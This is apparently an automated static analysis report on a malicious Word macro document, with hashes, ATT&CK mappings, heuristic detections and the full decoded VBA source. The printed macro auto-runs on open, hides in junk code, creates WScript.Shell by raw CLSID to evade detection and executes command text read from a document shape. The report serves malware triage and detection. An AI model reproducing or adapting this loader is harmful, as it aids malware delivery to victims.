Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4c2772556323bbc7…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 92.6 KB
Created: 2018-11-27 06:47:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: 2dbfff3b82120f21d6a0ade8967d8b71
SHA-1: f047be65d4455eae5b363fc4918ddbfd88cd6c59
SHA-256: 4c2772556323bbc74f23e33cc96425606b6baf7bb316bec336a80b6465ec10b6
Risk score: 252

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample contains VBA macros that leverage the `WScript.Shell` COM object to execute a command-line payload. This payload is heavily obfuscated but appears to be designed to download and save a second-stage executable, likely from one of the embedded URLs, and then execute it. The use of `cmd.exe` with execution flags and the `GetObject` call are strong indicators of malicious intent.

Heuristics (9)

  • ClamAV: Doc.Malware.Powload-6794695-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Powload-6794695-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS)
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched lines in script:
        End Select
        Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX)
           On Error Resume Next
  • GetObject call (high, OLE_VBA_GETOBJ)
    GetObject call
    Matched lines in script:
        End Select
        Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX)
           On Error Resume Next
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched lines in script:
        Attribute VB_Customizable = True
        Sub AutoOpen()
           On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD)
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12509 bytes
SHA-256: ebd3b826e21b8f0a178abe8b91f77b215a5b07ae99b070be4df57d42c7ecd6ea
Detection (ClamAV): No threats found
Obfuscation or payload: likely
150 of 239 identifiers look randomly generated (e.g. 'XIZqfYfGWLzjO') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "XIZqfYfGWLzjO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
 For Each tCRmww In cjOZubIUH
         kTidzb = 112378313 + Oct(199149819) - 145297173 - CBool(68214206 / 158638743) * 210112948 + Log(BWDFEpWI - CLng(42217841)) - 121179680 + Hex(UWaQwB)
      Next
      Select Case nIlSZJi
         Case 313746974
            AIanbwB = Cos(85802899)
            rWDfl = 31330792
         Case 195015284
            UJbAA = Sqr(208968723 / CSng(134342122 - Cos(207623383 - 242741274) + viztXIN + Rnd(148788059 - 338837569)))
            ijYUNNGf = Hex(IXhoXpZ)
End Select
   On Error Resume Next
 For Each zbWzcRhHC In VQIIhBfbO
         bfAvuww = 285128931 + Oct(328483897) - 269893510 - CBool(230402183 / 233212404) * 262124774 + Log(FVTZhOA - CLng(137751222)) - 125701621 + Hex(wRCYTM)
      Next
      Select Case OspTTbaF
         Case 209804501
            qJNPmd = Cos(218375070)
            MhGtz = 145696194
         Case 46301993
            lwcuYX = Sqr(246078164 / CSng(21915691 - Cos(132193451 - 280941349) + ImttTBtKL + Rnd(34774905 - 333976953)))
            oVVHif = Hex(tTMGpdc)
End Select
   On Error Resume Next
 For Each NZVHrkKL In TjuLhH
         lVtAMKsU = 259077105 + Oct(175872382) - 96739789 - CBool(35102662 / 198149222) * 290174166 + Log(jNMjf - CLng(284338957)) - 92618784 + Hex(bZKUcwhol)
      Next
      Select Case iSwlj
         Case 174291133
            jATQV = Cos(32184809)
            TMzjzzbw = 155141669
         Case 162786170
            aCqPVG = Sqr(252119536 / CSng(194267258 - Cos(6805720 - 311031811) + Ivilhzq + Rnd(305159641 - 210617841)))
            UcAQz = Hex(pncku)
End Select
Set zcGIqZF = Shapes("vDinjphmffzs")
   On Error Resume Next
 For Each MDRDNark In uAGiriYA
         mrEdQHZlp = 254285671 + Oct(19122784) - 162367836 - CBool(336891763 / 66175435) * 173302926 + Log(KSISf - CLng(163333038)) - 155647580 + Hex(cNjYMRtTA)
      Next
      Select Case BWijmJ
         Case 201942448
            kEhHvqj = Cos(194704665)
            PPiLNTFA = 19093991
         Case 182887480
            ZXtjY = Sqr(248290747 / CSng(53285955 - Cos(26037610 - 121193674) + jwnEoTS + Rnd(143824799 - 123476259)))
            sjkdDRBo = Hex(cijhi)
End Select
pJIiAJ = "" + ziJic + jQuHY + zcGIqZF.TextFrame.TextRange.Text + fkmIqnPj + TBpswRJ
   On Error Resume Next
 For Each KlzYSHp In QhKMTjcLF
         voNuPju = 234496582 + Oct(1425250) - 31340175 - CBool(142093183 / 33377164) * 125691362 + Log(sUijbHC - CLng(74975817)) - 338099482 + Hex(zwmqKT)
      Next
      Select Case BKBPRQ
         Case 103785002
            QdjHlcL = Cos(92786179)
            TwBwjwZk = 269902525
         Case 338384224
            SzDZjrUuR = Sqr(79108391 / CSng(176429965 - Cos(28057715 - 99123954) + KdTEOl + Rnd(251134105 - 229025172)))
            WLRRR = Hex(bicQSC)
End Select
   On Error Resume Next
 For Each ftkth In HASoPDlQp
         SFRous = 156988949 + Oct(76575773) - 86076362 - CBool(188578818 / 122962510) * 131309480 + Log(DaIAcWW - CLng(220659342)) - 189999582 + Hex(joEoFF)
      Next
      Select Case DHMAZt
         Case 251970365
            PnVZjEf = Cos(257714439)
            ONGCJuS = 200111815
         Case 277042021
            lzpDSGBZK = Sqr(47967789 / CSng(146232941 - Cos(199003495 - 220110428) + YMiBIwH + Rnd(1979232 - 9859246)))
            ZswItNu = Hex(jzAbajD)
End Select
   On Error Resume Next
 For Each ApwVn In CMELjroC
         GmmnTI = 150319400 + Oct(74223059) - 164437374 - CBool(106263990 / 196000478) * 306182640 + Log(aWsjLb - CLng(139535718)) - 156415883 + Hex(iwRthOjrn)
      Next
      Select Case PrOHz
         Case 13310610
            rdiXFJum = Cos(250255883)
            TAjNhtPI = 264091739
         Case 148511364
            bIihcZi = Sqr(161598292 / CSng(73405706 - Cos(97771756 - 310491447) + bjrtTYoW + Rnd(50072898 - 310411630)))
            NqHqiwzz = Hex(fLQVz)
End Select
Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX)
   On Error Resume Next
 For Each kPvffaG In iXnFZ
         TwMcLFH = 106739644 + Oct(49428363) - 184576167 - CBool(190154976 / 113153842) * 161566816 + Log(GYiKm - CLng(68716136)) - 335240117 + Hex(DTQzKq)
      Next
      Select Case hXPHmUX
         Case 152511519
            RdPUHS = Cos(18580377)
            BCwGpd = 124286432
         Case 100634376
            FvsMOuQ = Sqr(246946014 / CSng(168943465 - Cos(31805175 - 91061648) + ljjBV + Rnd(296581296 - 65308892)))
            iFkQCvIsY = Hex(twrMPbiAD)
End Select
   On Error Resume Next
 For Each CqlvcV In DXlrz
         hzuha = 333954160 + Oct(188842666) - 270372512 - CBool(1665060 / 77100024) * 252099489 + Log(tsJBivHEr - CLng(138430097)) - 201600949 + Hex(jRaWS)
      Next
      Select Case MoqXm
         Case 162925158
            GwSmbB = Cos(202943925)
            wjcqBsqju = 103417532
         Case 80444247
            qAIXGW = Sqr(314512782 / CSng(338263058 - Cos(325885581 - 45266167) + FlmYwoR + Rnd(104111737 - 125393019)))
            FhizfRLVF = Hex(HaEYFnujF)
End Select
   On Error Resume Next
 For Each MZzwQnqo In QDooRffIS
         azQpnQa = 230397907 + Oct(66222082) - 321930399 - CBool(260581950 / 292594431) * 265421505 + Log(OqnwjQL - CLng(166795692)) - 323400044 + Hex(AozpDniO)
      Next
      Select Case CVlvkMfqE
         Case 212535782
            HXPOabrhb = Cos(12874634)
            BBdowS = 244782857
         Case 204857202
            OZulEcu = Sqr(25431236 / CSng(247759652 - Cos(3871274 - 174536033) + tFjcZ + Rnd(229238273 - 97945176)))
            wBmwnTk = Hex(vONEZJ)
End Select
   On Error Resume Next
 For Each FjGpuG In dhSwCGjpz
         DzkuJs = 130566134 + Oct(230877970) - 315485465 - CBool(240704876 / 280430972) * 270157331 + Log(KNSBXp - CLng(206175781)) - 274272612 + Hex(JpBLYZvv)
      Next
      Select Case QVKpwa
         Case 160069389
            onGzWzoQH = Cos(230948378)
            FMASYUnv = 296698585
         Case 328270162
            unARZT = Sqr(44745590 / CSng(134832990 - Cos(96197724 - 290347221) + bAsijnp + Rnd(87782821 - 311598299)))
            qKqHQC = Hex(VLifwTsT)
End Select
Const YqdNOZWNFsO = 0
   On Error Resume Next
 For Each vHRwKItYm In XkmmqNuC
         qmtpjYMI = 5261330 + Oct(337583859) - 28218305 - CBool(16521689 / 250367537) * 113303406 + Log(wJGucPw - CLng(78686759)) - 223488177 + Hex(TzJjrlZjk)
      Next
      Select Case JBSkZwzs
         Case 167638167
            ilTMqjGz = Cos(168295996)
            taLsMZ = 21015202
         Case 188878421
            NiVBi = Sqr(107425643 / CSng(304311773 - Cos(284297681 - 144605082) + iQDmzOi + Rnd(210510536 - 317704214)))
            KfaHRpiqa = Hex(AuWjLDM)
End Select
   On Error Resume Next
 For Each jjcwwAsO In YmJLIVNPb
         wHtioIC = 131669723 + Oct(297451596) - 260858401 - CBool(167628492 / 130122781) * 24120620 + Log(vKkwwE - CLng(334771589)) - 16762167 + Hex(BvImAHij)
      Next
      Select Case VPHjqF
         Case 267809812
            vjzbSFivP = Cos(328242907)
            PQXjwWri = 209152702
         Case 147033808
            MOGJz = Sqr(267054494 / CSng(40785877 - Cos(100795948 - 130272771) + JIISDJiq + Rnd(167446204 - 281235507)))
            JtRwwiLK = Hex(WITuTkUIH)
End Select
   On Error Resume Next
 For Each OfzHou In JwEUAOZXi
         biiXh = 190053357 + Oct(140719652) - 98975785 - CBool(238431501 / 184009054) * 52328566 + Log(iwAjiEJ - CLng(188550759)) - 183517849 + Hex(GqWsHVjHt)
      Next
      Select Case GWbJAth
         Case 16663999
            sESmdSG = Cos(127611853)
            fVNGjk = 156406794
         Case 259854236
            oVzfd = Sqr(229912357 / CSng(225648339 - Cos(160167525 - 48209067) + qjpWHAi + Rnd(251020476 - 261580179)))
            sZACT = Hex(XLAqqlM)
End Select
   On Error Resume Next
 For Each sBdkdLfBZ In ihuEXJu
         jhbnjkV = 342184647 + Oct(35294010) - 149084274 - CBool(163655035 / 118014504) * 252883244 + Log(cWnDuM - CLng(340869608)) - 98673304 + Hex(TlfRFULCd)
      Next
      Select Case DZNREVsPd
         Case 40155471
            dHmRE = Cos(154286559)
            UPiVRp = 55739726
         Case 13121030
            TPftT = Sqr(311442042 / CSng(186194380 - Cos(229554633 - 286130372) + EjhBzV + Rnd(58517834 - 230879489)))
            iszAzuiOH = Hex(IXJCUZzw)
End Select
   On Error Resume Next
 For Each QAbrKN In THbVkjE
         TiiPqMLTA = 84060069 + Oct(12611690) - 96872909 - CBool(120321703 / 194036103) * 184622630 + Log(wnDBvd - CLng(236748226)) - 108238166 + Hex(LUjbjA)
      Next
      Select Case rkzSoDw
         Case 12798221
            hbiIw = Cos(30508862)
            fHWzfCzpu = 95623090
         Case 331322088
            sbrTLYX = Sqr(224383702 / CSng(209110041 - Cos(61910038 - 205578225) + oBvOBFHSH + Rnd(200701511 - 27745161)))
            KDzokH = Hex(ZFTJipH)
End Select
   On Error Resume Next
 For Each jomNUGAW In JjwrZ
         BjBrp = 212867215 + Oct(1993251) - 214060530 - CBool(188161058 / 36976412) * 336378897 + Log(Dtzhs - CLng(47427158)) - 327097053 + Hex(ZjzYfKqSu)
      Next
      Select Case VjAAp
         Case 325411059
            bSBjH = Cos(64390780)
            VFzcC = 179905002
         Case 260675052
            ubcUjcMfp = Sqr(223196655 / CSng(247638907 - Cos(121503574 - 234528600) + zCDBYR + Rnd(270395754 - 319442234)))
            RWpDZN = Hex(PTWioY)
End Select
ZZKijTUEO.Run! pJIiAJ, YqdNOZWNFsO
   On Error Resume Next
 For Each mDSRNbQ In pwLzCLj
         NjzDQSW = 28521830 + Oct(46801003) - 77671906 - CBool(52421925 / 9402214) * 31357133 + Log(Bakjz - CLng(76881356)) - 186922943 + Hex(YvPsovj)
      Next
      Select Case fDjEF
         Case 197606317
            WNUhO = Cos(67366311)
            TOVjw = 241016264
         Case 89213563
            OVwmHDo = Sqr(162280576 / CSng(196984544 - Cos(173743803 - 157300997) + jEVAD + Rnd(155565286 - 118291919)))
            SdiOQX = Hex(AWHwvpJ)
End Select
   On Error Resume Next
 For Each iZdpF In Uawli
         nUfOqzAic = 285244140 + Oct(156430341) - 38281510 - CBool(128212703 / 172978297) * 325938849 + Log(KKhNjz - CLng(283682856)) - 10685003 + Hex(ZRKqRoPim)
      Next
      Select Case TrJUFMYZ
         Case 260899405
            XWfHA = Cos(102563597)
            EQOoddPQ = 208631984
         Case 277927964
            KCIXhkibB = Sqr(275503653 / CSng(187462752 - Cos(8352407 - 48249859) + DzbDmCp + Rnd(15225306 - 19543668)))
            SYBqNt = Hex(ZWjOl)
End Select
   On Error Resume Next
 For Each jjdGlzvfL In KGKYkfCH
         MzBNkUs = 84301880 + Oct(6496923) - 289920881 - CBool(318138230 / 157775463) * 204418339 + Log(uWvzF - CLng(212113130)) - 55957420 + Hex(kjlHhwLT)
      Next
      Select Case kJKttiVt
         Case 246511817
            kunOQfFPB = Cos(266420009)
            zbQhNVbd = 259275296
         Case 317289365
            hGMOU = Sqr(57297455 / CSng(5257771 - Cos(291846325 - 169393740) + TmYkw + Rnd(114481797 - 139774352)))
            cjJfCmh = Hex(LjJuPwziN)
End Select
   On Error Resume Next
 For Each qTjqwf In EhdAwE
         KbXzWJ = 78796853 + Oct(30647158) - 337293845 - CBool(206463953 / 241990802) * 140367273 + Log(wZEFoDLLQ - CLng(39957539)) - 282306390 + Hex(hboZzpXC)
      Next
      Select Case ipvnvjB
         Case 252434425
            AGamQf = Cos(192246898)
            LtsHtVj = 100545256
         Case 270212401
            XiBqMTYU = Sqr(233397964 / CSng(62739947 - Cos(113861923 - 295591039) + JZwFkHv + Rnd(72567514 - 59446344)))
            ZdiJNkUOY = Hex(wiHSK)
End Select
   On Error Resume Next
 For Each QNDAKCqz In BamncLM
         YStEC = 245489871 + Oct(276736793) - 215207724 - CBool(333296236 / 120790748) * 228769178 + Log(EBAVOGi - CLng(277160228)) - 51330166 + Hex(njOHMVOj)
      Next
      Select Case oEhGu
         Case 82416589
            OcNULkIW = Cos(122456823)
            aQYVcWBif = 69462747
         Case 277720160
            ZUSPMuVWu = Sqr(38665808 / CSng(59746427 - Cos(229226672 - 291790028) + cndCa + Rnd(283971110 - 272496274)))
            uzKkLi = Hex(XOBpTDsB)
End Select
End Sub